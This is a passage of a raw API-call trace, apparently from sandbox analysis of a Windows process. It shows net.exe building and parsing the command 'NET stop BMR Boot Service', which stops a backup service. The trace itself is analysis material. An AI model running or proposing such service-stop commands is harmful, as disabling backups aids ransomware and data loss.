_Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned="\r\n" [0105.117] wcstok (in: _String=0x0, _Delimiter="$", _Context=0x3d6 | out: _String=0x0, _Context=0x3d6) returned 0x0 [0105.117] wcsspn (_String="NAMES", _Control="\x09\n\x0b\x0c\r ") returned 0x0 [0105.117] _wcsicmp (_String1="stop", _String2="NAMES") returned 5 [0105.117] wcsspn (_String="\r\nSYNTAX", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.117] _wcsicmp (_String1="stop", _String2="SYNTAX") returned -5 [0105.117] wcsspn (_String="\r\nSERVICES", _Control="\x09\n\x0b\x0c\r ") returned 0x2 [0105.117] _wcsicmp (_String1="stop", _String2="SERVICES") returned 15 [0105.117] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.117] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.118] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x111d, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The syntax of this command is:\r\n") returned 0x20 [0105.118] GetFileType (hFile=0x0) returned 0x0 [0105.118] LocalAlloc (uFlags=0x0, uBytes=0x40) returned 0x474088 [0105.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The syntax of this command is:\r\n", cchWideChar=32, lpMultiByteStr=0x474088, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The syntax of this command is:\r\n", lpUsedDefaultChar=0x0) returned 32 [0105.118] WriteFile (in: hFile=0x0, lpBuffer=0x474088, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16f300, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f300, lpOverlapped=0x0) returned 0 [0105.118] LocalFree (hMem=0x474088) returned 0x0 [0105.118] GetFileType (hFile=0x0) returned 0x0 [0105.118] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x473c18 [0105.118] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x473c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nG", lpUsedDefaultChar=0x0) returned 2 [0105.119] WriteFile (in: hFile=0x0, lpBuffer=0x473c18, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x16f300, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x16f300, lpOverlapped=0x0) returned 0 [0105.119] LocalFree (hMem=0x473c18) returned 0x0 [0105.119] wcscpy_s (in: _Destination=0x16f3b8, _SizeInWords=0x200, _Source="NET" | out: _Destination="NET") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET ") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET ", _SizeInWords=0x200, _Source="stop", _MaxCount=0xffffffff | out: _Destination="NET stop") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop ") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop ", _SizeInWords=0x200, _Source="BMR", _MaxCount=0xffffffff | out: _Destination="NET stop BMR") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop BMR", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop BMR ") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop BMR ", _SizeInWords=0x200, _Source="Boot", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop BMR Boot", _SizeInWords=0x200, _Source=" ", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot ") returned 0x0 [0105.119] wcsncat_s (in: _Destination="NET stop BMR Boot ", _SizeInWords=0x200, _Source="Service", _MaxCount=0xffffffff | out: _Destination="NET stop BMR Boot Service") returned 0x0 [0105.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G댸?\x16Ѱ?") returned 0xad [0105.119] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET ACCOUNTS\r\n[/FORCELOGO", _MaxCount=0x19) returned 18 [0105.119] LocalFree (hMem=0x4756f8) returned 0x0 [0105.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x2e [0105.119] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET COMPUTER\r\n\\\\computern", _MaxCount=0x19) returned 16 [0105.119] LocalFree (hMem=0x473e00) returned 0x0 [0105.119] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x7d [0105.119] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONFIG SERVER\r\n[/AUTO", _MaxCount=0x19) returned 16 [0105.119] LocalFree (hMem=0x4756f8) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x26 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONFIG\r\n[SERVER | WOR", _MaxCount=0x19) returned 16 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 16 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x1b [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET FILE\r\n[id [/CLOSE]]\r\n", _MaxCount=0x19) returned 13 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xbe [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET GROUP\r\n[groupname [/C", _MaxCount=0x19) returned 12 [0105.120] LocalFree (hMem=0x4756f8) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x33 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET HELP\r\ncommand\r\n -", _MaxCount=0x19) returned 11 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x19) returned 11 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xc1 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET LOCALGROUP\r\n[groupnam", _MaxCount=0x19) returned 7 [0105.120] LocalFree (hMem=0x4756f8) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x16 [0105.120] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x19) returned 3 [0105.120] LocalFree (hMem=0x473e00) returned 0x0 [0105.120] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x33 [0105.121] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET SESSION\r\n[\\\\computern", _MaxCount=0x19) returned 15 [0105.121] LocalFree (hMem=0x473e00) returned 0x0 [0105.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x234 [0105.121] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x19) returned 12 [0105.121] LocalFree (hMem=0x4756f8) returned 0x0 [0105.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x13 [0105.121] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START BROWSER\r\n", _MaxCount=0x19) returned 14 [0105.121] LocalFree (hMem=0x473e00) returned 0x0 [0105.121] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START EVENTLOG\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START MESSENGER\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START NET LOGON\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x16 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x11 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x12 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0xf [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0105.122] LocalFree (hMem=0x473e00) returned 0x0 [0105.122] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x17 [0105.122] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0105.123] LocalFree (hMem=0x473e00) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x18 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0105.123] LocalFree (hMem=0x473e00) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x2a [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0105.123] LocalFree (hMem=0x473e00) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0105.123] LocalFree (hMem=0x473e00) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x58 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0105.123] LocalFree (hMem=0x4756f8) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x184 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0105.123] LocalFree (hMem=0x4756f8) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xc7 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0105.123] LocalFree (hMem=0x4756f8) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x47 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0105.123] LocalFree (hMem=0x4756f8) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xc2 [0105.123] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0105.123] LocalFree (hMem=0x4756f8) returned 0x0 [0105.123] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x319 [0105.124] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0105.124] LocalFree (hMem=0x4756f8) returned 0x0 [0105.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x483 [0105.124] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0105.124] LocalFree (hMem=0x4756f8) returned 0x0 [0105.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xa86 [0105.124] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0105.124] LocalFree (hMem=0x4756f8) returned 0x0 [0105.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0x54 [0105.124] _wcsnicmp (_String1="NET stop BMR Boot Service", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0105.124] LocalFree (hMem=0x4756f8) returned 0x0 [0105.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16囸G\x16") returned 0xad [0105.124] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET ACCOUNTS\r\n[/F", _MaxCount=0x11) returned 18 [0105.124] LocalFree (hMem=0x4756f8) returned 0x0 [0105.124] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x2e [0105.124] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET COMPUTER\r\n\\\\c", _MaxCount=0x11) returned 16 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x7d [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONFIG SERVER", _MaxCount=0x11) returned 16 [0105.125] LocalFree (hMem=0x4756f8) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x26 [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONFIG\r\n[SERV", _MaxCount=0x11) returned 16 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET CONTINUE\r\nser", _MaxCount=0x11) returned 16 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x1b [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET FILE\r\n[id [/C", _MaxCount=0x11) returned 13 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xbe [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET GROUP\r\n[group", _MaxCount=0x11) returned 12 [0105.125] LocalFree (hMem=0x4756f8) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x33 [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET HELP\r\ncommand", _MaxCount=0x11) returned 11 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x19 [0105.125] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET HELPMSG\r\nmess", _MaxCount=0x11) returned 11 [0105.125] LocalFree (hMem=0x473e00) returned 0x0 [0105.125] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0xc1 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET LOCALGROUP\r\n[", _MaxCount=0x11) returned 7 [0105.126] LocalFree (hMem=0x4756f8) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x16 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET PAUSE\r\nservic", _MaxCount=0x11) returned 3 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x33 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET SESSION\r\n[\\\\c", _MaxCount=0x11) returned 15 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="囸G⡋盺\x16㸀G\x16") returned 0x234 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET SHARE\r\nsharen", _MaxCount=0x11) returned 12 [0105.126] LocalFree (hMem=0x4756f8) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16囸G\x16") returned 0x13 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START BROWSER", _MaxCount=0x11) returned 14 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START CLIPBOO", _MaxCount=0x11) returned 14 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x14 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START EVENTLO", _MaxCount=0x11) returned 14 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START MESSENG", _MaxCount=0x11) returned 14 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x15 [0105.126] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START NET LOG", _MaxCount=0x11) returned 14 [0105.126] LocalFree (hMem=0x473e00) returned 0x0 [0105.126] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x16 [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START RPCLOCA", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, Arguments=0x16f2fc | out: lpBuffer="㸀G⡋盺\x16㸀G\x16") returned 0x11 [0105.127] _wcsnicmp (_String1="NET stop BMR Boot", _String2="NET START RPCSS\r\n", _MaxCount=0x11) returned 14 [0105.127] LocalFree (hMem=0x473e00) returned 0x0 [0105.127] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74880000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x16f300, nSize=0x0, 